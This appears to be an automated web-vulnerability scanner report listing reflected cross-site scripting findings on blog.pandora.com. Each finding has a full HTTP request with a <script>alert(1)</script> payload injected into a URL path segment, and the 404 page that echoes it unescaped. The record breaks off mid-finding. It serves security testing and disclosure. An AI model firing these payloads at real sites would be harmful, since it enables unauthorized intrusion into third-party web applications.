GET /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010a1142<script>alert(1)</script>f83864e82ca/11/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8f51a<script>alert(1)</script>191470466ea was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/118f51a<script>alert(1)</script>191470466ea/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72e6e<script>alert(1)</script>09b739b49da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:23 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora72e6e<script>alert(1)</script>09b739b49da/archives/2010/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a3828<script>alert(1)</script>87512ebd2ab was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 369 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesa3828<script>alert(1)</script>87512ebd2ab/2010/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 39bf5<script>alert(1)</script>8b77ea0b66d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:28 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/201039bf5<script>alert(1)</script>8b77ea0b66d/11/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a869d<script>alert(1)</script>14889bb3dee was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:31 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11a869d<script>alert(1)</script>14889bb3dee/fantastic-fargo.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload f3d62<script>alert(1)</script>1d21570497f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/fantastic-fargo.htmlf3d62<script>alert(1)</script>1d21570497f was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 23985<script>alert(1)</script>089a1722201 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:20 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora23985<script>alert(1)</script>089a1722201/archives/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c61d<script>alert(1)</script>b40d4c584c3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2c61d<script>alert(1)</script>b40d4c584c3/2010/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5f834<script>alert(1)</script>c656c2ef387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:24 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20105f834<script>alert(1)</script>c656c2ef387/11/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4a98f<script>alert(1)</script>e7866274f68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:27 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/114a98f<script>alert(1)</script>e7866274f68/sioux-falls-and.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 83ec8<script>alert(1)</script>d52c4849003 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/sioux-falls-and.html83ec8<script>alert(1)</script>d52c4849003 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2056f<script>alert(1)</script>3737c338528 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:14 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora2056f<script>alert(1)</script>3737c338528/archives/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb220<script>alert(1)</script>cbc4db6c337 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:17 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archiveseb220<script>alert(1)</script>cbc4db6c337/2010/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9fcff<script>alert(1)</script>f60856fbcd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:19 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 368 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20109fcff<script>alert(1)</script>f60856fbcd/11/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b86f5<script>alert(1)</script>dbb2a670324 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:22 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11b86f5<script>alert(1)</script>dbb2a670324/town-halls-this.html was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 27a11<script>alert(1)</script>950dc27a619 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:25 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 369
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2010/11/town-halls-this.html27a11<script>alert(1)</script>950dc27a619 was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bdac6<script>alert(1)</script>af1c2098b93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:09 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandorabdac6<script>alert(1)</script>af1c2098b93/archives/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2a0b4<script>alert(1)</script>fcd5b5c5573 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:04:11 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives2a0b4<script>alert(1)</script>fcd5b5c5573/2010/12/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bb68a<script>alert(1)</script>703abccb638 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2010bb68a<script>alert(1)</script>703abccb638/12/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
